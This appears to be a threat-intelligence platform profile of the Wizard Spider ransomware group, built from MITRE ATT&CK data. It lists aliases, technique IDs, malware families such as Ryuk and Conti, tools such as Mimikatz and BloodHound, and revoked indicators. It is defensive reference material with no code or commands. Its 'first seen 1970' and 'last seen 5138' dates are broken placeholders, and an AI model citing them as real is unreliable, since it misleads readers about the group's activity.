Wizard Spider
Essential information
- Confidence
- 100/100
- Published
- 16/12/2025 19:39
- Modified
- 04/05/2026 16:33
- Updated at
- 04/05/2026 16:33
- Revoked
- No
- Author / Source
- The MITRE Corporation
- Resource level
- —
- Primary motivation
- —
- Related entities
- 76 attack patterns (mitre), 11 malware, 1 countries, 101 indicators, 11 tool
Aliases
TEMP.MixMaster Grim Spider GOLD BLACKBURN ITG23 Periwinkle Tempest DEV-0193 FIN12 UNC1878
Description
Marking (TLP)
TLP:CLEAR Copyright 2015-2025, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation.
External references
- CrowdStrike Wizard Spider October 2020
- Microsoft Threat Actor Naming July 2023
- CrowdStrike Grim Spider May 2019
- Secureworks Gold Blackburn Mar 2022
- Mandiant FIN12 Oct 2021
- FireEye KEGTAP SINGLEMALT October 2020
- Microsoft_PistachioTempest_Jan2024
- CrowdStrike Ryuk January 2019
- Mandiant FIN12 Oct 2021
- mitre-attack (G0102)
- DHS/CISA Ransomware Targeting Healthcare October 2020
- IBM X-Force ITG23 Oct 2021
- FireEye Ryuk and Trickbot January 2019
Related entities
Attack patterns, malware, vulnerabilities, indicators and other entities linked to this intrusion set.
Attack patterns (MITRE) (76)
-
T1490 usesInhibit System Recovery MITRE
-
T1112 usesModify Registry MITRE
-
Email Accounts usesT1585.002 MITRE
-
T1562.001 usesDisable or Modify Tools MITRE
-
T1071.001 usesWeb Protocols MITRE
-
T1222.001 usesWindows File and Directory Permissions Modification MITRE
-
T1003.003 usesNTDS MITRE
-
T1068 usesExploitation for Privilege Escalation MITRE
-
T1218.011 usesRundll32 MITRE
-
T1046 usesNetwork Service Discovery MITRE
-
-
T1135 usesNetwork Share Discovery MITRE
Malware (11)
-
Emotet usesFamily The MITRE Corporation Confidence 100
[Emotet](https://attack.mitre.org/software/S0367) is a modular malware variant which is primarily used as a downloader for other malware variants such as [TrickBot](https://attack.mitre.org/software/S0266) and [IcedID](https://attack.mitre.org/software/S0483). Emotet first emerged in June 2014,…
First seen 01/01/1970 · Last seen 16/11/5138 · -
Anchor usesFamily The MITRE Corporation Confidence 100
[Anchor](https://attack.mitre.org/software/S0504) is one of a family of backdoor malware that has been used in conjunction with [TrickBot](https://attack.mitre.org/software/S0266) on selected high profile targets since at least 2018.(Citation: Cyberreason Anchor…
First seen 01/01/1970 · Last seen 16/11/5138 · -
GrimAgent usesFamily The MITRE Corporation Confidence 100
[GrimAgent](https://attack.mitre.org/software/S0632) is a backdoor that has been used before the deployment of [Ryuk](https://attack.mitre.org/software/S0446) ransomware since at least 2020; it is likely used by [FIN6](https://attack.mitre.org/groups/G0037) and [Wizard Spider](https://attack.mitre.org/groups/G0102).(Citation: Group…
First seen 01/01/1970 · Last seen 16/11/5138 · -
Dyre usesFamily The MITRE Corporation Confidence 100
[Dyre](https://attack.mitre.org/software/S0024) is a banking Trojan that has been used for financial gain. (Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)
First seen 01/01/1970 · Last seen 16/11/5138 · -
Conti usesFamily The MITRE Corporation Confidence 100
[Conti](https://attack.mitre.org/software/S0575) is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. [Conti](https://attack.mitre.org/software/S0575) has been deployed via [TrickBot](https://attack.mitre.org/software/S0266) and used against major corporations and government agencies, particularly those…
First seen 01/01/1970 · Last seen 16/11/5138 · -
Ryuk usesFamily The MITRE Corporation Confidence 100
[Ryuk](https://attack.mitre.org/software/S0446) is a ransomware designed to target enterprise environments that has been used in attacks since at least 2018. [Ryuk](https://attack.mitre.org/software/S0446) shares code similarities with Hermes ransomware.(Citation: CrowdStrike Ryuk…
First seen 01/01/1970 · Last seen 16/11/5138 · -
Cobalt Strike usesFamily The MITRE Corporation Confidence 100
[Cobalt Strike](https://attack.mitre.org/software/S0154) is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced…
First seen 01/01/1970 · Last seen 16/11/5138 · -
SystemBC usesAlienVault Confidence 100
[SystemBC](https://attack.mitre.org/software/S9001) is a malware family offered as a malware-as-a-service (MaaS) that is used to establish command and control and facilitate follow-on activity, including ransomware deployment.[SystemBC](https://attack.mitre.org/software/S9001) executes a variety…
First seen 01/01/1970 · Last seen 16/11/5138 · -
Bazar usesFamily The MITRE Corporation Confidence 100
[Bazar](https://attack.mitre.org/software/S0534) is a downloader and backdoor that has been used since at least April 2020, with infections primarily against professional services, healthcare, manufacturing, IT, logistics and travel companies…
First seen 01/01/1970 · Last seen 16/11/5138 · -
Diavol usesFamily The MITRE Corporation Confidence 100
[Diavol](https://attack.mitre.org/software/S0659) is a ransomware variant first observed in June 2021 that is capable of prioritizing file types to encrypt based on a pre-configured list of extensions defined by…
First seen 01/01/1970 · Last seen 16/11/5138 · -
TSPY_TRICKLOAD usesThe MITRE Corporation Confidence 100
[TrickBot](https://attack.mitre.org/software/S0266) is a Trojan spyware program written in C++ that first emerged in September 2016 as a possible successor to [Dyre](https://attack.mitre.org/software/S0024). [TrickBot](https://attack.mitre.org/software/S0266) was developed and initially used by…
First seen 01/01/1970 · Last seen 16/11/5138 ·
Countries (1)
-
United States of America targets
Indicators (101)
-
stix 100/100 Revoked· Valid until 02/02/2022 · Source: AlienVault
-
stix 100/100 Revoked· Valid until 02/02/2022 · Source: AlienVault
-
stix 100/100 Revoked· Valid until 02/02/2022 · Source: AlienVault
-
stix 100/100 Revoked· Valid until 02/02/2022 · Source: AlienVault
-
stix 100/100 Revoked
Win32:MalwareX-gen\ [Trj]
· Valid until 02/02/2022 · Source: AlienVault -
stix 100/100 Revoked· Valid until 02/02/2022 · Source: AlienVault
-
stix 100/100 Revoked· Valid until 02/02/2022 · Source: AlienVault
-
stix 100/100 Revoked· Valid until 02/02/2022 · Source: AlienVault
Tool (11)
-
Net usesThe MITRE Corporation Confidence 100
The [Net](https://attack.mitre.org/software/S0039) utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. (Citation: Microsoft…
-
Mimikatz usesThe MITRE Corporation Confidence 100
[Mimikatz](https://attack.mitre.org/software/S0002) is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of…
-
AdFind usesThe MITRE Corporation Confidence 100
[AdFind](https://attack.mitre.org/software/S0552) is a free command-line query tool that can be used for gathering information from Active Directory.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation:…
-
Rubeus usesThe MITRE Corporation Confidence 100
[Rubeus](https://attack.mitre.org/software/S1071) is a C# toolset designed for raw Kerberos interaction that has been used since at least 2020, including in ransomware operations.(Citation: GitHub Rubeus March 2023)(Citation: FireEye KEGTAP…
-
Nltest usesThe MITRE Corporation Confidence 100
[Nltest](https://attack.mitre.org/software/S0359) is a Windows command-line utility used to list domain controllers and enumerate domain trusts.(Citation: Nltest Manual)
-
Empire usesThe MITRE Corporation Confidence 100
[Empire](https://attack.mitre.org/software/S0363) is an open-source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents…
-
BITSAdmin usesThe MITRE Corporation Confidence 100
[BITSAdmin](https://attack.mitre.org/software/S0190) is a command line tool used to create and manage [BITS Jobs](https://attack.mitre.org/techniques/T1197). (Citation: Microsoft BITSAdmin)
-
Ping usesThe MITRE Corporation Confidence 100
[Ping](https://attack.mitre.org/software/S0097) is an operating system utility commonly used to troubleshoot and verify network connections. (Citation: TechNet Ping)
-
LaZagne usesThe MITRE Corporation Confidence 100
[LaZagne](https://attack.mitre.org/software/S0349) is a post-exploitation, open-source tool used to recover stored passwords on a system. It has modules for Windows, Linux, and OSX, but is mainly focused on Windows…
-
PsExec usesThe MITRE Corporation Confidence 100
[PsExec](https://attack.mitre.org/software/S0029) is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers.(Citation: Russinovich Sysinternals)(Citation: SANS…
-
BloodHound usesThe MITRE Corporation Confidence 100
[BloodHound](https://attack.mitre.org/software/S0521) is an Active Directory (AD) reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.(Citation: GitHub Bloodhound)(Citation: CrowdStrike BloodHound April 2018)(Citation: FoxIT…